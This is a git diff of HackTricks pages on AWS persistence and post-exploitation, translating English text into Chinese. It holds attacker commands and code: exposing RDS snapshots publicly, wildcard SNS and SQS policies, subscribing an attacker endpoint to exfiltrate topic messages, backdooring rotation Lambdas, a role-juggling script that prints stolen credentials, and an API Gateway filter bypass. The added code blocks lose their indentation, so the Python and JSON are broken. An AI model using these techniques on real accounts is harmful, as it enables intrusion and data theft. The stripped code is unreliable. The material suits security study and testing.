+攻击者可以访问实例并对其进行后门操作: -- Using a traditional **rootkit** for example -- Adding a new **public SSH key** -- Expose a port with port knocking with a backdoor +- 例如使用传统的 **rootkit** +- 添加新的 **公共 SSH 密钥** +- 使用后门暴露一个端口并进行端口敲击 -### DNS persistence +### DNS 持久性 -If domains are configured: +如果域名已配置: -- Create a subdomain pointing your IP so you will have a **subdomain takeover** -- Create **SPF** record allowing you to send **emails** from the domain -- Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones +- 创建一个指向您的 IP 的子域,以便您将拥有 **子域接管** +- 创建 **SPF** 记录,允许您从该域发送 **电子邮件** +- 将 **主域 IP 配置为您自己的 IP**,并从您的 IP 对合法 IP 执行 **MitM** {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md index b7a4b8f7b..0d3859920 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md @@ -1,35 +1,27 @@ -# AWS - RDS Persistence +# AWS - RDS 持久性 {{#include ../../../banners/hacktricks-training.md}} ## RDS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-relational-database-rds-enum.md {{#endref}} -### Make instance publicly accessible: `rds:ModifyDBInstance` - -An attacker with this permission can **modify an existing RDS instance to enable public accessibility**. +### 使实例公开可访问:`rds:ModifyDBInstance` +具有此权限的攻击者可以**修改现有的 RDS 实例以启用公共可访问性**。 ```bash aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately ``` +### 在数据库中创建管理员用户 -### Create an admin user inside the DB - -An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database. - -### Make snapshot public +攻击者可以**在数据库中创建一个用户**,即使主用户的密码被修改,他也**不会失去对数据库的访问**。 +### 使快照公开 ```bash aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md index f2c4ce048..2eb434759 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md @@ -1,29 +1,25 @@ -# AWS - S3 Persistence +# AWS - S3 持久性 {{#include ../../../banners/hacktricks-training.md}} ## S3 -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-s3-athena-and-glacier-enum.md {{#endref}} -### KMS Client-Side Encryption +### KMS 客户端加密 -When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again: +当加密过程完成后,用户将使用 KMS API 生成一个新密钥(`aws kms generate-data-key`),并将**生成的加密密钥存储在文件的元数据中**([python 代码示例](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)),以便在解密时可以再次使用 KMS 进行解密:
-Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it. +因此,攻击者可以从元数据中获取此密钥,并使用 KMS(`aws kms decrypt`)进行解密,以获得用于加密信息的密钥。这样,攻击者将拥有加密密钥,如果该密钥被重用于加密其他文件,他将能够使用它。 -### Using S3 ACLs +### 使用 S3 ACLs -Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket. +尽管通常存储桶的 ACL 被禁用,但具有足够权限的攻击者可以滥用它们(如果启用或攻击者可以启用它们)以保持对 S3 存储桶的访问。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md index c15f27003..7dc60a195 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md @@ -4,54 +4,48 @@ ## Secrets Manager -For more info check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-secrets-manager-enum.md {{#endref}} -### Via Resource Policies +### 通过资源策略 -It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**. +可以通过资源策略**授予外部账户对秘密的访问权限**。有关更多信息,请查看[**Secrets Manager Privesc 页面**](../aws-privilege-escalation/aws-secrets-manager-privesc.md)。请注意,要**访问一个秘密**,外部账户还**需要访问加密该秘密的 KMS 密钥**。 -### Via Secrets Rotate Lambda +### 通过 Secrets Rotate Lambda -To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself. - -This is how lambda code for such action could look like: +要**自动旋转秘密**,会调用一个配置好的**Lambda**。如果攻击者能够**更改**该**代码**,他可以直接**将新秘密导出**给自己。 +这就是此类操作的 Lambda 代码可能的样子: ```python import boto3 def rotate_secrets(event, context): - # Create a Secrets Manager client - client = boto3.client('secretsmanager') +# Create a Secrets Manager client +client = boto3.client('secretsmanager') - # Retrieve the current secret value - secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString'] +# Retrieve the current secret value +secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString'] - # Rotate the secret by updating its value - new_secret_value = rotate_secret(secret_value) - client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value) +# Rotate the secret by updating its value +new_secret_value = rotate_secret(secret_value) +client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value) def rotate_secret(secret_value): - # Perform the rotation logic here, e.g., generate a new password +# Perform the rotation logic here, e.g., generate a new password - # Example: Generate a new password - new_secret_value = generate_password() +# Example: Generate a new password +new_secret_value = generate_password() - return new_secret_value +return new_secret_value def generate_password(): - # Example: Generate a random password using the secrets module - import secrets - import string - password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16)) - return password +# Example: Generate a random password using the secrets module +import secrets +import string +password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16)) +return password ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md index 8e97cc81c..c8cb805d5 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md @@ -1,85 +1,77 @@ -# AWS - SNS Persistence +# AWS - SNS 持久性 {{#include ../../../banners/hacktricks-training.md}} ## SNS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-sns-enum.md {{#endref}} -### Persistence - -When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ -The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**: +### 持久性 +创建 **SNS 主题** 时,您需要通过 IAM 策略指明 **谁有权读取和写入**。可以指明外部账户、角色的 ARN,或 **甚至 "\*"**。\ +以下策略允许 AWS 中的每个人访问名为 **`MySNS.fifo`** 的 SNS 主题进行读取和写入: ```json { - "Version": "2008-10-17", - "Id": "__default_policy_ID", - "Statement": [ - { - "Sid": "__default_statement_ID", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "SNS:Publish", - "SNS:RemovePermission", - "SNS:SetTopicAttributes", - "SNS:DeleteTopic", - "SNS:ListSubscriptionsByTopic", - "SNS:GetTopicAttributes", - "SNS:AddPermission", - "SNS:Subscribe" - ], - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo", - "Condition": { - "StringEquals": { - "AWS:SourceOwner": "318142138553" - } - } - }, - { - "Sid": "__console_pub_0", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "SNS:Publish", - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" - }, - { - "Sid": "__console_sub_0", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "SNS:Subscribe", - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" - } - ] +"Version": "2008-10-17", +"Id": "__default_policy_ID", +"Statement": [ +{ +"Sid": "__default_statement_ID", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": [ +"SNS:Publish", +"SNS:RemovePermission", +"SNS:SetTopicAttributes", +"SNS:DeleteTopic", +"SNS:ListSubscriptionsByTopic", +"SNS:GetTopicAttributes", +"SNS:AddPermission", +"SNS:Subscribe" +], +"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo", +"Condition": { +"StringEquals": { +"AWS:SourceOwner": "318142138553" +} +} +}, +{ +"Sid": "__console_pub_0", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "SNS:Publish", +"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" +}, +{ +"Sid": "__console_sub_0", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "SNS:Subscribe", +"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" +} +] } ``` +### 创建订阅者 -### Create Subscribers - -To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**. - -Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used. +为了继续从所有主题中提取所有消息,攻击者可以**为所有主题创建订阅者**。 +请注意,如果**主题是 FIFO 类型**,则只能使用协议**SQS**的订阅者。 ```bash aws sns subscribe --region \ - --protocol http \ - --notification-endpoint http:/// \ - --topic-arn +--protocol http \ +--notification-endpoint http:/// \ +--topic-arn ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md index 88f396173..98030299c 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md @@ -1,43 +1,37 @@ -# AWS - SQS Persistence +# AWS - SQS 持久性 {{#include ../../../banners/hacktricks-training.md}} ## SQS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-sqs-and-sns-enum.md {{#endref}} -### Using resource policy - -In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ -The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**: +### 使用资源策略 +在 SQS 中,您需要通过 IAM 策略指明 **谁可以访问读取和写入**。可以指明外部账户、角色的 ARN,或 **甚至 "\*"**。\ +以下策略允许 AWS 中的每个人访问名为 **MyTestQueue** 的队列中的所有内容: ```json { - "Version": "2008-10-17", - "Id": "__default_policy_ID", - "Statement": [ - { - "Sid": "__owner_statement", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": ["SQS:*"], - "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue" - } - ] +"Version": "2008-10-17", +"Id": "__default_policy_ID", +"Statement": [ +{ +"Sid": "__owner_statement", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": ["SQS:*"], +"Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue" +} +] } ``` - > [!NOTE] -> You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html) +> 您甚至可以**在攻击者的账户中每次有新消息**放入队列时触发一个 Lambda(您需要以某种方式重新放入它)。为此,请遵循以下说明: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md index c1b9a422b..3bd0aae28 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md @@ -1,6 +1 @@ # AWS - SSM Perssitence - - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md index 4e8c120ff..2c12e3f5e 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md @@ -4,7 +4,7 @@ ## Step Functions -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-stepfunctions-enum.md @@ -12,14 +12,10 @@ For more information check: ### Step function Backdooring -Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps. +对步骤函数进行后门设置,使其执行任何持久性技巧,以便每次执行时都会运行您的恶意步骤。 ### Backdooring aliases -If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function. +如果AWS账户使用别名来调用步骤函数,则可以修改别名以使用步骤函数的新后门版本。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md index 74db04bec..9ca4ad338 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md @@ -1,65 +1,62 @@ -# AWS - STS Persistence +# AWS - STS 持久性 {{#include ../../../banners/hacktricks-training.md}} ## STS -For more information access: +有关更多信息,请访问: {{#ref}} ../aws-services/aws-sts-enum.md {{#endref}} -### Assume role token +### 假设角色令牌 -Temporary tokens cannot be listed, so maintaining an active temporary token is a way to maintain persistence. +临时令牌无法列出,因此保持活动的临时令牌是一种维持持久性的方法。
aws sts get-session-token --duration-seconds 129600
 
-# With MFA
+# 使用 MFA
 aws sts get-session-token \
-    --serial-number <mfa-device-name> \
-    --token-code <code-from-token>
+--serial-number <mfa-device-name> \
+--token-code <code-from-token>
 
-# Hardware device name is usually the number from the back of the device, such as GAHT12345678
-# SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
-# Vritual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username
+# 硬件设备名称通常是设备背面的数字,例如 GAHT12345678
+# 短信设备名称是 AWS 中的 ARN,例如 arn:aws:iam::123456789012:sms-mfa/username
+# 虚拟设备名称是 AWS 中的 ARN,例如 arn:aws:iam::123456789012:mfa/username
 
-### Role Chain Juggling +### 角色链切换 -[**Role chaining is an acknowledged AWS feature**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), often utilized for maintaining stealth persistence. It involves the ability to **assume a role which then assumes another**, potentially reverting to the initial role in a **cyclical manner**. Each time a role is assumed, the credentials' expiration field is refreshed. Consequently, if two roles are configured to mutually assume each other, this setup allows for the perpetual renewal of credentials. - -You can use this [**tool**](https://github.com/hotnops/AWSRoleJuggler/) to keep the role chaining going: +[**角色链切换是一个被认可的 AWS 特性**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining),通常用于保持隐蔽的持久性。它涉及能够 **假设一个角色,然后假设另一个角色**,可能以 **循环的方式** 还原到初始角色。每次假设角色时,凭证的过期字段都会刷新。因此,如果两个角色被配置为相互假设,这种设置允许凭证的永久更新。 +您可以使用这个 [**工具**](https://github.com/hotnops/AWSRoleJuggler/) 来保持角色链切换: ```bash ./aws_role_juggler.py -h usage: aws_role_juggler.py [-h] [-r ROLE_LIST [ROLE_LIST ...]] optional arguments: - -h, --help show this help message and exit - -r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...] +-h, --help show this help message and exit +-r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...] ``` - > [!CAUTION] -> Note that the [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured. +> 请注意,来自该Github存储库的 [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) 脚本并不能找到角色链配置的所有方式。
-Code to perform Role Juggling from PowerShell - +从PowerShell执行角色切换的代码 ```powershell # PowerShell script to check for role juggling possibilities using AWS CLI # Check for AWS CLI installation if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) { - Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'." - exit +Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'." +exit } # Function to list IAM roles function List-IAMRoles { - aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json +aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json } # Initialize error count @@ -70,66 +67,61 @@ $roles = List-IAMRoles | ConvertFrom-Json # Attempt to assume each role foreach ($role in $roles) { - $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) - try { - $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json - if ($credentials) { - Write-Host "Successfully assumed role: $($role.RoleName)" - Write-Host "Access Key: $($credentials.AccessKeyId)" - Write-Host "Secret Access Key: $($credentials.SecretAccessKey)" - Write-Host "Session Token: $($credentials.SessionToken)" - Write-Host "Expiration: $($credentials.Expiration)" +$sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) +try { +$credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json +if ($credentials) { +Write-Host "Successfully assumed role: $($role.RoleName)" +Write-Host "Access Key: $($credentials.AccessKeyId)" +Write-Host "Secret Access Key: $($credentials.SecretAccessKey)" +Write-Host "Session Token: $($credentials.SessionToken)" +Write-Host "Expiration: $($credentials.Expiration)" - # Set temporary credentials to assume the next role - $env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId - $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey - $env:AWS_SESSION_TOKEN = $credentials.SessionToken +# Set temporary credentials to assume the next role +$env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId +$env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey +$env:AWS_SESSION_TOKEN = $credentials.SessionToken - # Try to assume another role using the temporary credentials - foreach ($nextRole in $roles) { - if ($nextRole.Arn -ne $role.Arn) { - $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) - try { - $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json - if ($nextCredentials) { - Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)" - Write-Host "Access Key: $($nextCredentials.AccessKeyId)" - Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)" - Write-Host "Session Token: $($nextCredentials.SessionToken)" - Write-Host "Expiration: $($nextCredentials.Expiration)" - } - } catch { - $errorCount++ - } - } - } +# Try to assume another role using the temporary credentials +foreach ($nextRole in $roles) { +if ($nextRole.Arn -ne $role.Arn) { +$nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) +try { +$nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json +if ($nextCredentials) { +Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)" +Write-Host "Access Key: $($nextCredentials.AccessKeyId)" +Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)" +Write-Host "Session Token: $($nextCredentials.SessionToken)" +Write-Host "Expiration: $($nextCredentials.Expiration)" +} +} catch { +$errorCount++ +} +} +} - # Reset environment variables - Remove-Item Env:\AWS_ACCESS_KEY_ID - Remove-Item Env:\AWS_SECRET_ACCESS_KEY - Remove-Item Env:\AWS_SESSION_TOKEN - } else { - $errorCount++ - } - } catch { - $errorCount++ - } +# Reset environment variables +Remove-Item Env:\AWS_ACCESS_KEY_ID +Remove-Item Env:\AWS_SECRET_ACCESS_KEY +Remove-Item Env:\AWS_SESSION_TOKEN +} else { +$errorCount++ +} +} catch { +$errorCount++ +} } # Output the number of errors if any if ($errorCount -gt 0) { - Write-Host "$errorCount error(s) occurred during role assumption attempts." +Write-Host "$errorCount error(s) occurred during role assumption attempts." } else { - Write-Host "No errors occurred. All roles checked successfully." +Write-Host "No errors occurred. All roles checked successfully." } Write-Host "Role juggling check complete." ``` -
{{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md index 53f79d916..c692338a4 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md @@ -1,6 +1 @@ -# AWS - Post Exploitation - - - - - +# AWS - 后期利用 diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md index 4847c40e0..96829e503 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md @@ -4,48 +4,43 @@ ## API Gateway -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-api-gateway-enum.md {{#endref}} -### Access unexposed APIs +### 访问未公开的 API -You can create an endpoint in [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) with the service `com.amazonaws.us-east-1.execute-api`, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections.\ -Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before. +您可以在 [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) 创建一个服务为 `com.amazonaws.us-east-1.execute-api` 的端点,将该端点暴露在您可以访问的网络中(可能通过 EC2 机器),并分配一个允许所有连接的安全组。\ +然后,从 EC2 机器上,您将能够访问该端点,从而调用之前未公开的网关 API。 -### Bypass Request body passthrough +### 绕过请求体传递 -This technique was found in [**this CTF writeup**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp). +此技术在 [**此 CTF 文章**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp) 中发现。 -As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) in the `PassthroughBehavior` section, by default, the value **`WHEN_NO_MATCH`** , when checking the **Content-Type** header of the request, will pass the request to the back end with no transformation. - -Therefore, in the CTF the API Gateway had an integration template that was **preventing the flag from being exfiltrated** in a response when a request was sent with `Content-Type: application/json`: +正如 [**AWS 文档**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) 中的 `PassthroughBehavior` 部分所示,默认情况下,值 **`WHEN_NO_MATCH`** 在检查请求的 **Content-Type** 头时,将请求传递给后端而不进行任何转换。 +因此,在 CTF 中,API Gateway 有一个集成模板,该模板 **阻止了标志在响应中被外泄**,当请求以 `Content-Type: application/json` 发送时: ```yaml RequestTemplates: - application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}' +application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}' ``` +然而,发送一个带有 **`Content-type: text/json`** 的请求将会阻止该过滤器。 -However, sending a request with **`Content-type: text/json`** would prevent that filter. - -Finally, as the API Gateway was only allowing `Get` and `Options`, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header `X-HTTP-Method-Override: GET`: - +最后,由于 API Gateway 仅允许 `Get` 和 `Options`,因此可以通过发送一个带有查询的 POST 请求,并使用头部 `X-HTTP-Method-Override: GET` 来发送任意的 dynamoDB 查询,而没有任何限制: ```bash curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}' ``` +### 使用计划 DoS -### Usage Plans DoS +在 **Enumeration** 部分,您可以看到如何 **获取密钥的使用计划**。如果您拥有密钥并且它的 **每月使用次数限制为 X**,您可以 **直接使用它并造成 DoS**。 -In the **Enumeration** section you can see how to **obtain the usage plan** of the keys. If you have the key and it's **limited** to X usages **per month**, you could **just use it and cause a DoS**. - -The **API Key** just need to be **included** inside a **HTTP header** called **`x-api-key`**. +**API Key** 只需包含在一个名为 **`x-api-key`** 的 **HTTP 头** 中。 ### `apigateway:UpdateGatewayResponse`, `apigateway:CreateDeployment` -An attacker with the permissions `apigateway:UpdateGatewayResponse` and `apigateway:CreateDeployment` can **modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts**. - +拥有权限 `apigateway:UpdateGatewayResponse` 和 `apigateway:CreateDeployment` 的攻击者可以 **修改现有的 Gateway Response,以包含自定义头或响应模板,这些模板泄露敏感信息或执行恶意脚本**。 ```bash API_ID="your-api-id" RESPONSE_TYPE="DEFAULT_4XX" @@ -56,16 +51,14 @@ aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RE # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources. +**潜在影响**:敏感信息泄露、执行恶意脚本或未经授权访问API资源。 > [!NOTE] -> Need testing +> 需要测试 ### `apigateway:UpdateStage`, `apigateway:CreateDeployment` -An attacker with the permissions `apigateway:UpdateStage` and `apigateway:CreateDeployment` can **modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data**. - +拥有权限 `apigateway:UpdateStage` 和 `apigateway:CreateDeployment` 的攻击者可以 **修改现有的API Gateway阶段,将流量重定向到不同的阶段或更改缓存设置以获得对缓存数据的未经授权访问**。 ```bash API_ID="your-api-id" STAGE_NAME="Prod" @@ -76,16 +69,14 @@ aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --pat # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Unauthorized access to cached data, disrupting or intercepting API traffic. +**潜在影响**:未经授权访问缓存数据,干扰或拦截API流量。 > [!NOTE] -> Need testing +> 需要测试 ### `apigateway:PutMethodResponse`, `apigateway:CreateDeployment` -An attacker with the permissions `apigateway:PutMethodResponse` and `apigateway:CreateDeployment` can **modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts**. - +拥有权限 `apigateway:PutMethodResponse` 和 `apigateway:CreateDeployment` 的攻击者可以**修改现有API Gateway REST API方法的响应,以包含自定义头或响应模板,这些头或模板泄露敏感信息或执行恶意脚本**。 ```bash API_ID="your-api-id" RESOURCE_ID="your-resource-id" @@ -98,16 +89,14 @@ aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources. +**潜在影响**:敏感信息泄露、执行恶意脚本或未经授权访问API资源。 > [!NOTE] -> Need testing +> 需要测试 ### `apigateway:UpdateRestApi`, `apigateway:CreateDeployment` -An attacker with the permissions `apigateway:UpdateRestApi` and `apigateway:CreateDeployment` can **modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API**. - +拥有权限 `apigateway:UpdateRestApi` 和 `apigateway:CreateDeployment` 的攻击者可以**修改API Gateway REST API设置以禁用日志记录或更改最低TLS版本,从而可能削弱API的安全性**。 ```bash API_ID="your-api-id" @@ -117,16 +106,14 @@ aws apigateway update-rest-api --rest-api-id $API_ID 